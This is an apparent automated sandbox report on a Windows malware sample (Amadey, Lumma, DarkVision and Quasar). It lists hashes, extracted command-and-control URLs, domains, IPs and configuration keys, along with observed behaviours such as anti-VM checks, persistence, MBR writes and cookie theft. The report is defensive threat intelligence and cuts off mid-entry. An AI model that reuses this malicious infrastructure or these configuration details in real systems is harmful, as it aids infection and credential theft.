amadey | 16b64046640bb6230c3bf41bdebb18224781fef9f2225bc30b82a063b1ed3fa8

Analysis

max time kernel
295s
max time network
303s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
06/04/2025, 10:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

6.1MB
MD5

5a0c7d37859d3542f6772b9ef5ee5cf8
SHA1

27b53f77c9f99b87c6f9b1908310a5e2d73d1a79
SHA256

16b64046640bb6230c3bf41bdebb18224781fef9f2225bc30b82a063b1ed3fa8
SHA512

d2aa0be1f1cf059aaba9d3770c515f8be68698d7f631d321662feab5eae93996c9b4d23b862d7e59065701914498c9a92f1a687b302380dc56b9bc056b7fdc0a
SSDEEP

98304:zN9nbWR9YW1UZPiPQHMP6sYv15XNcDNwKmzyVyrooaCs3TOJ1yC/nCjlHI8GpHCz:HY9YO+PiPpY3NONweCZ/ycPBCvJ9F8

Score

10^/10

amadey darkvision lumma quasar 092155 office04 bootkit credential_access defense_evasion discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://6plantainklj.run/opafg

https://gpuerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://cosmosyf.top/GOsznj

https://yjrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://xrfxcaseq.live/gspaz

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

Extracted

Family

darkvision

82.29.67.160

Attributes

url
http://107.174.192.179/data/003

https://grabify.link/ZATFQO

http://107.174.192.179/clean
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral3/memory/10644-10588-0x000000000C3A0000-0x000000000C4F4000-memory.dmp	family_quasar
behavioral3/memory/10644-10589-0x0000000004B50000-0x0000000004B6A000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1224 created 2828	1224	MSBuild.exe	49

Contacts a large (16541) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2i0393.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	712b652cf6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ff15d61e9f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	but2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1P22P6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
16768	10644	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
11576	powershell.exe
10644	powershell.exe
17368	powershell.exe
2860	powershell.exe
14544	powershell.exe
11780	powershell.exe
24184	powershell.exe
18320	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 16 IoCs

flow	pid	Process
6	2240	rapes.exe
6	2240	rapes.exe
6	2240	rapes.exe
14815	2240	rapes.exe
86	2240	rapes.exe
17294	12924	futors.exe
11	1328	svchost.exe
70	2240	rapes.exe
1429	2240	rapes.exe
1429	2240	rapes.exe
11209	2240	rapes.exe
11209	2240	rapes.exe
16465	2240	rapes.exe
16465	2240	rapes.exe
16465	2240	rapes.exe
104	2240	rapes.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\08f9389d.sys	d59464fb.exe
File created	C:\Windows\System32\Drivers\klupd_08f9389da_arkmon.sys	d59464fb.exe

Sets service image path in registry 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\79DvEKr5_1112\ImagePath = "\\??\\C:\\Windows\\Temp\\DH7C9_1112.sys"	tzutil.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\08f9389d\ImagePath = "System32\\Drivers\\08f9389d.sys"	d59464fb.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_08f9389da_arkmon\ImagePath = "System32\\Drivers\\klupd_08f9389da_arkmon.sys"	d59464fb.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 18 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
9564	chrome.exe
1852	chrome.exe
1596	msedge.exe
1080	chrome.exe
6688	msedge.exe
14904	msedge.exe
14736	msedge.exe
11184	chrome.exe
976	msedge.exe
13592	msedge.exe
9872	chrome.exe
10020	chrome.exe
6872	chrome.exe
18360	msedge.exe
3440	chrome.exe
4424	msedge.exe
18264	chrome.exe
11800	chrome.exe

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1P22P6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1P22P6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2i0393.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2i0393.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	712b652cf6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	but2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	but2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ff15d61e9f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ff15d61e9f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	712b652cf6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Deletes itself 1 IoCs

pid	Process
428	w32tm.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a9216524.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a9216524.cmd	powershell.exe

Executes dropped EXE 32 IoCs

pid	Process
3472	x2T29.exe
2620	1P22P6.exe
2240	rapes.exe
4384	2i0393.exe
1632	d69de35f48.exe
5160	UZPt0hR.exe
4144	TbV75ZR.exe
2176	712b652cf6.exe
1112	tzutil.exe
428	w32tm.exe
15024	Rm3cVPI.exe
15060	rapes.exe
7152	rapes.exe
788	ff15d61e9f.exe
7632	9sWdA2p.exe
7680	485a3f32.exe
5948	d59464fb.exe
9368	but2.exe
9836	pcidrv.exe
9672	larBxd7.exe
14916	Jordan.com
5956	qhjMWht.exe
9348	rapes.exe
9500	RYZusWg.exe
9336	pcidrv.exe
12908	LJl8AAr.exe
8320	n0hEgR9.exe
9116	amnew.exe
10568	IsValueCreated.exe
12924	futors.exe
10556	v7942.exe
1888	alex12312321.exe

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Wine	712b652cf6.exe
Key opened	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Wine	1P22P6.exe
Key opened	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Wine	ff15d61e9f.exe
Key opened	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Wine	but2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Wine	2i0393.exe

Impair Defenses: Safe Mode Boot 1 TTPs 3 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\08f9389d.sys	d59464fb.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\08f9389d.sys\ = "Driver"	d59464fb.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\08f9389d.sys	d59464fb.exe

Loads dropped DLL 17 IoCs

pid	Process
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe
5948	d59464fb.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
17308	takeown.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	71.167.85.149

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	x2T29.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\df8eb9d6-05ad-4bcb-8947-423be52337e1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{2fc3435b-4506-4aed-8d41-c2cddb9fb5c2}\\df8eb9d6-05ad-4bcb-8947-423be52337e1.cmd\""	d59464fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	random.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17795	ip-api.com
22107	ipinfo.io
22109	ipinfo.io
106	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	d59464fb.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral3/files/0x001900000002b36e-17490.dat	autoit_exe
behavioral3/files/0x001f00000002b10e-18424.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
11976	tasklist.exe
13480	tasklist.exe
12780	tasklist.exe
13668	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
2620	1P22P6.exe
2240	rapes.exe
4384	2i0393.exe
2176	712b652cf6.exe
15060	rapes.exe
7152	rapes.exe
788	ff15d61e9f.exe
9368	but2.exe
9348	rapes.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1632 set thread context of 492	1632	d69de35f48.exe	96
PID 4144 set thread context of 1224	4144	TbV75ZR.exe	107
PID 12908 set thread context of 12592	12908	LJl8AAr.exe	172
PID 8320 set thread context of 11104	8320	n0hEgR9.exe	174
PID 10556 set thread context of 1228	10556	v7942.exe	186
PID 1888 set thread context of 4964	1888	alex12312321.exe	188

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	d59464fb.exe
File opened (read-only)	\??\VBoxMiniRdrDN	485a3f32.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\futors.job	amnew.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\Tasks\rapes.job	1P22P6.exe
File opened for modification	C:\Windows\GovernmentalOttawa	larBxd7.exe
File opened for modification	C:\Windows\AmongDouble	larBxd7.exe
File opened for modification	C:\Windows\GentleOklahoma	larBxd7.exe
File opened for modification	C:\Windows\ModularVol	larBxd7.exe
File opened for modification	C:\Windows\LowerOrgasm	larBxd7.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4688	sc.exe
3156	sc.exe
7680	sc.exe
5496	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 8 IoCs

pid	pid_target	Process	procid_target
4892	1224	WerFault.exe	107
17612	6512	WerFault.exe	288
18076	868	WerFault.exe	289
24164	18020	WerFault.exe	299
17716	4344	WerFault.exe	329
17660	24404	WerFault.exe	328
13356	10424	WerFault.exe	332
17352	13028	WerFault.exe	413

System Location Discovery: System Language Discovery 1 TTPs 45 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pcidrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	larBxd7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	485a3f32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	but2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	712b652cf6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d59464fb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qhjMWht.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x2T29.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1P22P6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Jordan.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2i0393.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ff15d61e9f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 9 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
8564	PING.EXE
8780	PING.EXE
8864	PING.EXE
8960	PING.EXE
8988	PING.EXE
8920	PING.EXE
9036	PING.EXE
9096	PING.EXE
9160	PING.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe

Delays execution with timeout.exe 3 IoCs

defense_evasion

pid	Process
8436	timeout.exe
10052	timeout.exe
17684	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	21605	Go-http-client/1.1

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
2492	taskkill.exe
18264	taskkill.exe
6240	taskkill.exe
17572	taskkill.exe
8820	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000_Classes\Local Settings	rapes.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
9208	reg.exe
17544	reg.exe
10152	reg.exe
4584	reg.exe

Modifies system certificate store 2 TTPs 8 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Microsoft\SystemCertificates\CA\Certificates\00ABEFD055F9A9C784FFDEABD1DCDD8FED741436\Blob = 03000000010000001400000000abefd055f9a9c784ffdeabd1dcdd8fed741436140000000100000014000000bbbcc347a5e4bca9c6c3a4720c108da235e1c8e8040000000100000010000000af1c77aecc8d77e9aacb0c475840c3920f0000000100000020000000e644ba6963e335fe765cb9976b12b10eb54294b42477764ccb3a3acca3acb2fc1900000001000000100000002cd60f91d0dfd482d593b92501780d005c0000000100000004000000000800001800000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000000905000030820505308202eda00302010202104ba85293f79a2fa273064ba8048d75d0300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3234303331333030303030305a170d3237303331323233353935395a3033310b300906035504061302555331163014060355040a130d4c6574277320456e6372797074310c300a0603550403130352313030820122300d06092a864886f70d01010105000382010f003082010a0282010100cf57e5e6c45412edb447fec92758764650288c1d3e88df059dd5b51829bdddb55abffaf6cea3beaf00214b625a5a3c012fc55803f689ff8e1143ebc1b5e01407968f6f1fd7e7ba8139097565b7c2af185b372628e7a3f4072b6d1affab58bc95ae40ffe9cb57c4b55b7f780d1861bc17e754c6bb4991cd6e18d18085eea66536bc74eabc504ceafc21f338169394bab0d36b3806cd16127aca5275c8ad76b2c29c5d98455c6f617bc62dee3c13528601d957e6381cdf8db51f92919ae74a1ccc45a87255f0b0e6a307ecfda71b669e3f488b71847158c93afaef5ef25b442b3c74e78fb247c1076acd9ab70d96f712812651540aec61f6f7f5e2f28ac8950d8d0203010001a381f83081f5300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030206082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e04160414bbbcc347a5e4bca9c6c3a4720c108da235e1c8e8301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30130603551d20040c300a3008060667810c01020130270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f300d06092a864886f70d01010b0500038202010092b1e74137eb799d81e6cde225e13a20e9904495a3815ccfc35dfdbda070d5b19628220bd2f228cf0ce7d4e6438c24221dc14292d109af9f4bf4c8704f2016b15add01f61ff81f616b1427b0728d63aeeee2ce4bcf37ddbba3d4cde7ad50adbdbfe3ec3e6236709931a7e88dddea62e212aef59cd43d2c0caad09c79beea3d5c446e9631635a7dd67e4f24a04b057f5e6fd2d4ea5f334b13d657b6cade51b85da3098274fdc7789eb3b9ac16da4a2b96c3b68b628ff97419a29e03dee96f9bb00fd2a05af6855cc204b7c8d54e32c4bf045dbc29f6f7818f0c5d3c53c940908bfbb60865b9a421d509e51384843782ce1028fc76c206257a46524dda5372a4273f6270acbe694800fb670fdb5ba1e8d703212dd7c9f69942398343df770a1208f125d6ba9419541888a5c58ee11a9993796bec1cf93140b0cc3200df9f5ee7b492ab9082918d0de01e95ba593b2e4b5fc2b74635523906c0bdaaac52c122a0449799f70ca021a7a16c714716170168c0caa62665047cb3aec9e79455c26f9b3c1ca9f92ec5201af076e0beec18d64fd825fb7611e8bfe6210fe8e8ccb5b6a7d5b8f79f41cf6122466a83b668972e7cea4e95db23eb2ec82b2884a460e949f4442e3bf9ca625701e25d9016f9c9fc7a23488ea6d58172f128fa5dcefbed4e738f942ed241949899dba7af705ff5befb0220bf66276cb4adfa75120b2b3ece039e	pcidrv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1	pcidrv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1\Blob = 